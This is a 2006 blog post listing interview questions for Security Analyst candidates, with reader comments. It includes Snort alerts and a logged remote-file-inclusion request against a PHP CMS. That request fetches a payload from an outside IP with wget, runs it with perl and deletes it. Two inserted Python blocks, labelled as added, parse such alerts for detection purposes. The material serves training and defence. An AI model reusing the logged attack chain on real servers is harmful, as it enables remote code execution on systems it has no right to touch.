work and IT @ 28 Nov 2006 01:23 am by ayoi
Conducted an interview session for a few Security Analyst posts to be stationed at The Client site this morning. For today's session, there were 4 candidates, which at first I hoped would be better than the last batch that I interviewed quite some time ago. These candidates were the ones who passed the assessment test that they sat last Friday morning. For those who want to know what kind of questions would be asked if I were the interviewer, below are those questions.
p/s: You'll discover that most of the questions are not too detailed because mainly I'm looking for the ones who have sound fundamental security knowledge. (Btw most of the candidates will only "gape/stare open-mouthed/grin sheepishly" when asked a slightly more detailed question such as why IPS is different from a conventional firewall? - I know this is not a detailed question)
1) I would ask you to introduce yourself (Education background, family, skills etc)
- I would like to point out that most of the candidates tend to concentrate on their education background, family background, hobbies etc., but so far only a few mentioned their experience, knowledge, skills, interests, goals, or purpose in applying for the job. So next time please remember that the interviewer wants to know how you express yourself (for communication evaluation), and your objectives, vision and mission in joining the company and so on, instead of knowing what your favourite meals, favourite colours, hobbies and any other unrelated matters are.
2) To test your basic security knowledge, the question would be either
a) What is your opinion regarding network security? or
b) What do you understand about ICT Security as a whole? or
c) In order to keep the risk at an acceptable level, what do you think would be a good security process practice?
3) What do you know about Security Analyst? (This question is regarding the post)
- I do expect that all the candidates at least do some research on the internet. It sounds ridiculous if you yourself don't even know about the job that you want to apply for. Ever heard of Google before?
4) What do you know about IDS? (Because we are using IDS)
a) Difference between IDS and IPS
b) Experience/ hands-on training of using any IDS
c) Understand the mechanism of the IDS
d) Able to read/interpret/understand the signatures/rules. *Bonus
e) IDS Deployment *Bonus as well
5) Only 2 questions. (I made some modifications and if you do notice about the odd
[**] [1:2001717:0] ATTACK-RESPONSES id check returned userid [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841 10.14.3.3:53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0x10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0x99984D5A Win: 0x5A8 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499
[**] [1:2001717:0] ATTACK-RESPONSES id check returned root [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841 10.14.3.3.53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0x10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0x99984D5A Win: 0x5B4 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499
Info on 23.143.3.3
HTTP/1.1 200 OK
Date: Sat, 17 June 2006 19:34:48 GMT
Server: Apache/2.2.0 (Unix)
Last-Modified: Sun, 09 Jul 2006 17:43:47 GMT
ETag: "20003-39aa-41829a3c27ac0"
Accept-Ranges: bytes
Content-Length: 14762
Cache-Control: max-age=86400
Expires: Sun, 16 Jul 2006 19:34:48 GMT
Content-Type: text/htm
What do you think about those alerts above?
And the other question would be:
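An added example, not part of the original post: a small Python triage of the first alert above that checks whether the logged header lengths leave any TCP payload for a content-matching signature to have hit. The parser, the dictionary keys and the triage notes are assumptions made for illustration; the alert text is the post's own with the "0x" prefixes restored.

```python
import re

# Constructed input: the first alert from the post, "0x" prefixes restored.
ALERT = """\
[**] [1:2001717:0] ATTACK-RESPONSES id check returned userid [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841 10.14.3.3:53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0x10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0x99984D5A Win: 0x5A8 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499
"""

HEADER = re.compile(r"\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]")
FLOW = re.compile(r"(\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)")
FIELD = re.compile(r"(IpLen|DgmLen|TcpLen):\s*(\d+)")
FLAGS = re.compile(r"^([*12UAPRSF]{8}) Seq:", re.M)

def parse_alert(text):
    """Parse one full-mode TCP alert; None if a field is missing or malformed
    (e.g. the second alert's source written as 10.14.3.3.53473)."""
    head, flow = HEADER.search(text), FLOW.search(text)
    lens = {k: int(v) for k, v in FIELD.findall(text)}
    flags = FLAGS.search(text)
    if not (head and flow and flags and len(lens) == 3):
        return None
    return {
        "sid": int(head.group(2)), "msg": head.group(4),
        "src": (flow.group(1), int(flow.group(2))),
        "dst": (flow.group(3), int(flow.group(4))),
        "flags": flags.group(1).replace("*", ""),
        # IP total length minus IP header minus TCP header = TCP payload bytes
        "payload_len": lens["DgmLen"] - lens["IpLen"] - lens["TcpLen"],
    }

def triage(alert):
    """Return analyst notes (heuristics, not verdicts) for a parsed alert."""
    notes = []
    if alert["payload_len"] <= 0:
        notes.append("no TCP payload: nothing for a content match to hit")
    if 443 in (alert["src"][1], alert["dst"][1]):
        notes.append("port 443: payload is normally TLS, not cleartext")
    if alert["msg"].startswith("ATTACK-RESPONSES") and alert["dst"][1] < 1024:
        notes.append("response-class alert on a packet sent to a server port")
    return notes
```
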
/2006/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://66.111.211.183/~secilmis/memberz/cmd.txt?&cmd=cd%20/tmp;wget%20http://66.111.211.183/~secilmis/
memberz/travma;perl%20travma;rm%20-rf%20travma?
HTTP/1.0
What is/are the intention of the attacker?
What are the conditions that the attacker needs to know about the system in order to make sure that his attack is successful?
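An added example, not part of the original post: detection logic in Python that splits a logged request like the one above into its parameters and flags the three things an analyst would look for. The indicator names and the analyse() helper are assumptions for illustration, and the sample line is constructed from the post's request with the remote host and path replaced by placeholders (192.0.2.10, ~user).

```python
from urllib.parse import unquote

# Constructed input: the post's request joined onto one line, with the remote
# host and user path replaced by placeholders.
REQUEST = ("/2006/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1"
           "&GLOBALS=&mosConfig_absolute_path=http://192.0.2.10/~user/cmd.txt?"
           "&cmd=cd%20/tmp;wget%20http://192.0.2.10/~user/travma;"
           "perl%20travma;rm%20-rf%20travma? HTTP/1.0")

SUPERGLOBALS = ("GLOBALS", "_REQUEST", "_GET", "_POST", "_COOKIE", "_SERVER")
REMOTE = ("http://", "https://", "ftp://")

def analyse(line):
    """Return (indicators, shell_steps) for one logged request line."""
    # Works with or without a leading method: take the token that is the path.
    target = next((t for t in line.split() if t.startswith("/")), "")
    _, _, query = target.partition("?")
    indicators, steps = [], []
    for pair in query.split("&"):      # split on '&' only: values contain ';'
        name, _, raw = pair.partition("=")
        value = unquote(raw)
        # Parameter named after a PHP superglobal: attempt to overwrite it.
        if name.split("[")[0] in SUPERGLOBALS:
            indicators.append(("superglobal-overwrite", name))
        # Parameter whose value is a URL: possible remote file inclusion.
        if value.lower().startswith(REMOTE):
            indicators.append(("remote-include", name))
        # Shell metacharacters: decode the chain into individual commands.
        if ";" in value or "|" in value or "`" in value:
            indicators.append(("shell-chain", name))
            steps = [s.strip().rstrip("?") for s in value.split(";") if s.strip()]
    return indicators, steps
```

The first word of each decoded step names a tool or location the target host would need for the chain to run, which is one way to approach the second question.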
So that's it. Hehehe. Anyway those questions are the basic questions. So from time to time, based on your answer, perhaps we can venture a little bit further. Any comments on these questions? Perhaps you can give more constructive questions as well.

Err, what is this?
It's good to see an interviewer who actually asks real things when hiring a security analyst.
Check ID returned and remote code execution through vulnerable php cms
Cheers dude
Could you provide the answers to the questions? I drafted my own answers but would like to compare them with the actual answers from the interviewer. That way I can add to my knowledge a bit. Even brief answers would do, as long as I can understand. Thanks.
Read below about ICT. That's not all: the manager will ask how to handle users who are kiasu or frantic and all want things fast. Another thing managers like to ask: "If there is urgent work, can you come back to the office if the server is down, even though a colleague has fallen sick and you are not on standby?" Note: the manager will test you on teamwork.
Don't be angry if I criticise a little: sometimes young people are too stingy about sharing information on IT manuals. Like at my workplace, I have to play tug of war. This colleague of mine is Chinese and very stingy with IT information. Asking them for information is like asking for money; you have to know how to be nice.
http://www.bsi-global.com/ICT/Security/faqs.xalter
[...] Requirement – Know whut the hell is IDS (And to one particular candidate from one technology university from south, IDS is not a firewall and it is definitely not a policy system of segmenting our network by using VLAN for security purpose) [...]
Whoa.. cool!
hi nice site.
hi all.
The intention is command prompt / cmd.
Is that right??